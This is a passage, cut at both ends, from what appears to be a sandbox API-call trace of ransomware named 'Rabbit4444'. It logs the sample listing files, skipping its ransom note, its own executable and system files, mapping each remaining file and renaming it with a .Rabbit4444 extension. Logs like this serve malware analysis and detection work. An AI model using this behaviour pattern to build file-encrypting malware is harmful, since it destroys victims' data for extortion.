"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_isautomaticdstadjustenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.139] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x235f22ac, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x235f22ac, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x529, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", cAlternateFileName="AA7FFC~1.SET")) returned 1 [0057.139] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.139] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.139] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.139] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.139] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.139] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.139] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.139] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.139] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.139] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.139] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.139] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms") returned="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms" [0057.139] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.139] lstrlenW (lpString="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms") returned 75 [0057.139] lstrlenW (lpString="Rabbit4444") returned 10 [0057.139] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.140] lstrlenW (lpString=".dll") returned 4 [0057.140] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.140] lstrlenW (lpString=".lnk") returned 4 [0057.140] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.140] lstrlenW (lpString=".ini") returned 4 [0057.140] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.140] lstrlenW (lpString=".sys") returned 4 [0057.140] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.140] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_istimesetautomaticallyenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.140] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.140] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14845077448) returned 1 [0057.140] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1321) returned 1 [0057.140] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0057.140] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.140] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0057.142] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0057.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.143] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14845396601) returned 1 [0057.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0057.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.143] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.143] CloseHandle (hObject=0x298) returned 1 [0057.143] CloseHandle (hObject=0x278) returned 1 [0057.144] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms.Rabbit4444") returned 203 [0057.144] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_istimesetautomaticallyenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_istimesetautomaticallyenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.145] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23939648, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x23939648, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", cAlternateFileName="AAEAA2~1.SET")) returned 1 [0057.145] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.145] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.145] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.145] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.145] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.145] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.145] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.145] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.145] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.145] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.145] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.145] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms") returned="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms" [0057.145] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.145] lstrlenW (lpString="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms") returned 79 [0057.145] lstrlenW (lpString="Rabbit4444") returned 10 [0057.145] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.145] lstrlenW (lpString=".dll") returned 4 [0057.145] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.145] lstrlenW (lpString=".lnk") returned 4 [0057.145] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.145] lstrlenW (lpString=".ini") returned 4 [0057.145] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.145] lstrlenW (lpString=".sys") returned 4 [0057.145] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.146] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_istimezonesetautomaticallyenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.146] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.146] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14845655205) returned 1 [0057.146] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1341) returned 1 [0057.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0057.146] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x298 [0057.147] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x70000 [0057.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.148] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14845889558) returned 1 [0057.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0057.148] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.148] CloseHandle (hObject=0x298) returned 1 [0057.148] CloseHandle (hObject=0x278) returned 1 [0057.148] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms.Rabbit4444") returned 207 [0057.149] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_istimezonesetautomaticallyenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_istimezonesetautomaticallyenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.149] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23cf2fd9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x23cf2fd9, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DateTime_Set.settingcontent-ms", cAlternateFileName="AAD480~1.SET")) returned 1 [0057.149] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_Set.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.149] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_Set.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.149] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_Set.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.149] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_Set.settingcontent-ms", lpString2=".") returned 1 [0057.149] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_Set.settingcontent-ms", lpString2="..") returned 1 [0057.149] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_Set.settingcontent-ms", lpString2="windows") returned -1 [0057.149] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_Set.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.149] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_Set.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.149] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_Set.settingcontent-ms", lpString2="boot") returned -1 [0057.149] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_Set.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.150] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_Set.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.150] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DateTime_Set.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DateTime_Set.settingcontent-ms") returned="AAA_SystemSettings_DateTime_Set.settingcontent-ms" [0057.150] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_Set.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.150] lstrlenW (lpString="AAA_SystemSettings_DateTime_Set.settingcontent-ms") returned 49 [0057.150] lstrlenW (lpString="Rabbit4444") returned 10 [0057.150] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.150] lstrlenW (lpString=".dll") returned 4 [0057.150] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.150] lstrlenW (lpString=".lnk") returned 4 [0057.150] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.150] lstrlenW (lpString=".ini") returned 4 [0057.150] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.150] lstrlenW (lpString=".sys") returned 4 [0057.150] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.150] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_Set.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_set.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.150] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.150] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14846115728) returned 1 [0057.150] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1191) returned 1 [0057.151] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0057.151] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0057.151] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7b0, lpName=0x0) returned 0x298 [0057.152] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7b0) returned 0x70000 [0057.152] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.152] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0057.152] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.152] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.152] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.153] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.153] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.153] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0057.153] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14846357008) returned 1 [0057.153] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0057.153] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0057.153] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.153] CloseHandle (hObject=0x298) returned 1 [0057.153] CloseHandle (hObject=0x278) returned 1 [0057.153] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_Set.settingcontent-ms.Rabbit4444") returned 177 [0057.153] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_Set.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_set.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_Set.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_set.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.157] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23e7080f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x23e7080f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", cAlternateFileName="AACB48~1.SET")) returned 1 [0057.157] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.157] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.157] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.157] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", lpString2=".") returned 1 [0057.158] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", lpString2="..") returned 1 [0057.158] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", lpString2="windows") returned -1 [0057.158] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.158] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.158] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", lpString2="boot") returned -1 [0057.158] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.158] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.158] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms") returned="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms" [0057.158] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.158] lstrlenW (lpString="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms") returned 56 [0057.158] lstrlenW (lpString="Rabbit4444") returned 10 [0057.158] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.158] lstrlenW (lpString=".dll") returned 4 [0057.158] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.158] lstrlenW (lpString=".lnk") returned 4 [0057.158] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.158] lstrlenW (lpString=".ini") returned 4 [0057.158] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.158] lstrlenW (lpString=".sys") returned 4 [0057.158] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.158] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_setformats.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.159] QueryPerformanceFrequency 